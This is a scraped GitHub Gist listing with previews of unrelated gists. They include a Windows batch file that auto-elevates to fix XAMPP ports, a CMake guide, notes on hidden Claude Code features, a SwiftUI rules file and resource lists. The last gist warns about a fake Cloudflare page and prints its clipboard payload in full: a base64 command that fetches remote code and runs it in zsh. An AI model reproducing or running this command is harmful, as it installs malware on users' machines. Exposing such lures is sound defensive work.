Skip to content

Instantly share code, notes, and snippets.

@vancuong4662
vancuong4662 / gist:55539e5e047367cab34401a36c879f29
Created February 4, 2026 01:04
Batch file để fix lỗi chiếm port của XAMPP
@echo off
:: BatchGotAdmin - Auto-elevate to Administrator
:-------------------------------------
REM --> Check for permissions
IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
)
@mbinna
mbinna / effective_modern_cmake.md
Last active February 4, 2026 00:59
Effective Modern CMake

Effective Modern CMake

Getting Started

For a brief user-level introduction to CMake, watch C++ Weekly, Episode 78, Intro to CMake by Jason Turner. LLVM’s CMake Primer provides a good high-level introduction to the CMake syntax. Go read it now.

After that, watch Mathieu Ropert’s CppCon 2017 talk Using Modern CMake Patterns to Enforce a Good Modular Design (slides). It provides a thorough explanation of what modern CMake is and why it is so much better than “old school” CMake. The modular design ideas in this talk are based on the book [Large-Scale C++ Software Design](https://www.amazon.de/Large-Scale-Soft

@kieranklaassen
kieranklaassen / 2026-01-23-feat-claude-code-multi-agent-orchestration-plan.md
Last active February 4, 2026 00:57
Claude Code Multi-Agent Orchestration System

Claude Code TeammateTool - Source Code Analysis

This is not a proposal. This documents existing but hidden functionality found in Claude Code v2.1.19 binary, plus speculation on how it could be used.


Executive Summary

TeammateTool already exists in Claude Code. We extracted this from the compiled binary at ~/.local/share/claude/versions/2.1.19 using strings analysis. The feature is fully implemented but gated behind feature flags (I9() && qFB()).

@kieranklaassen
kieranklaassen / SKILL.md
Last active February 4, 2026 00:56
Claude Code Swarm Orchestration Skill - Complete guide to multi-agent coordination with TeammateTool, Task system, and all patterns
name description
orchestrating-swarms
Master multi-agent orchestration using Claude Code's TeammateTool and Task system. Use when coordinating multiple agents, running parallel code reviews, creating pipeline workflows with dependencies, building self-organizing task queues, or any task benefiting from divide-and-conquer patterns.

Claude Code Swarm Orchestration

Master multi-agent orchestration using Claude Code's TeammateTool and Task system.


@emschwartz
emschwartz / README.md
Last active February 4, 2026 00:56
The Most Popular Blogs of Hacker News in 2025

This is an OPML version of the HN Popularity Contest results for 2025, for importing into RSS feed readers.

Plug: if you want to find content related to your interests from thousands of obscure blogs and noisy sources like HN Newest, check out Scour. It's a free, personalized content feed I work on where you define your interests in your own words and it ranks content based on how closely related it is to those topics.

@harryworld
harryworld / ui-rule.mdc
Created May 21, 2025 22:20
Cursor Rules for iOS app development using modern SwiftUI (iOS 17 or later)
# UI framework rules for SwiftUI
1. State Management:
- Use `@Observable` for reference types holding business logic and app state.
- Use `@Bindable` properties within @Observable classes so SwiftUI views can bind directly to them.
- Avoid `@State` for view model observation, rely on `let model: MyModel` instead.
- Pass dependencies via initialisers rather than as global singletons.
- Use `@Environment` for app-wide or large-scope states.
- `@State` is only for view-local state.
- Use `@Binding` only if necessary
@imba-tjd
imba-tjd / .Cloud.md
Last active February 4, 2026 00:53
☁️ 一些免费的云资源

  • IaaS指提供系统(可以自己选)或者储存空间之类的硬件,软件要自己手动装。PaaS提供语言环境和框架(可以自己选)。SaaS只能使用开发好的软件(卖软件本身,如税务会计、表格文字处理)。BaaS一般类似于非关系数据库,但各家不通用
  • 云服务的特点:零前期成本 & 按需付费 & 弹性(类似于租,可随时多加、退掉;但没有残值)、高可用(放在机房中,不同AZ间水电隔离)

如果你想补充内容,建议优先给 free-for-dev 提PR,还能混个高星repo的contributor,没必要加到本列表里。
If you want to make improvements, I would recommend you contributing to free-for-dev rather than this list.

其他人的集合

@Antosik
Antosik / Internship.md
Last active February 4, 2026 00:51
IT Стажировки в Москве и России

Список IT стажировок и вакансий без опыта в Москве и России

  • Яндекс
    • Программы стажировок
      • Разработка (Python, C++, Java, Go, Kotlin, Scala, C, Flutter, фронтенд, DevOps, Android, iOS)
      • Анализ данных
      • Информационная безопасность
      • Тестирование
      • Менеджмент в IT
  • Бизнес

This site presents itself as a cloudflare confirmation page https://authentification4macos.com/t1/

image

It copies this thing into the user clipboard

echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlcyBwbGVhc2Ugd2FpdC4uLicgJiYgY3VybCAta2ZzU0wgaHR0cDovL2VsZnJvZGJsb29tLnRvZGF5L2N1cmwvYTc1NGM5MDczZjg1NmRjZjE2ZDIwM2RhNDFhOTQxOGI4ZjA5ZGZhOGUyZTU0NTkyMDA5YjAxYmM5NjEwZDRkZnx6c2g='|base64 -D|zsh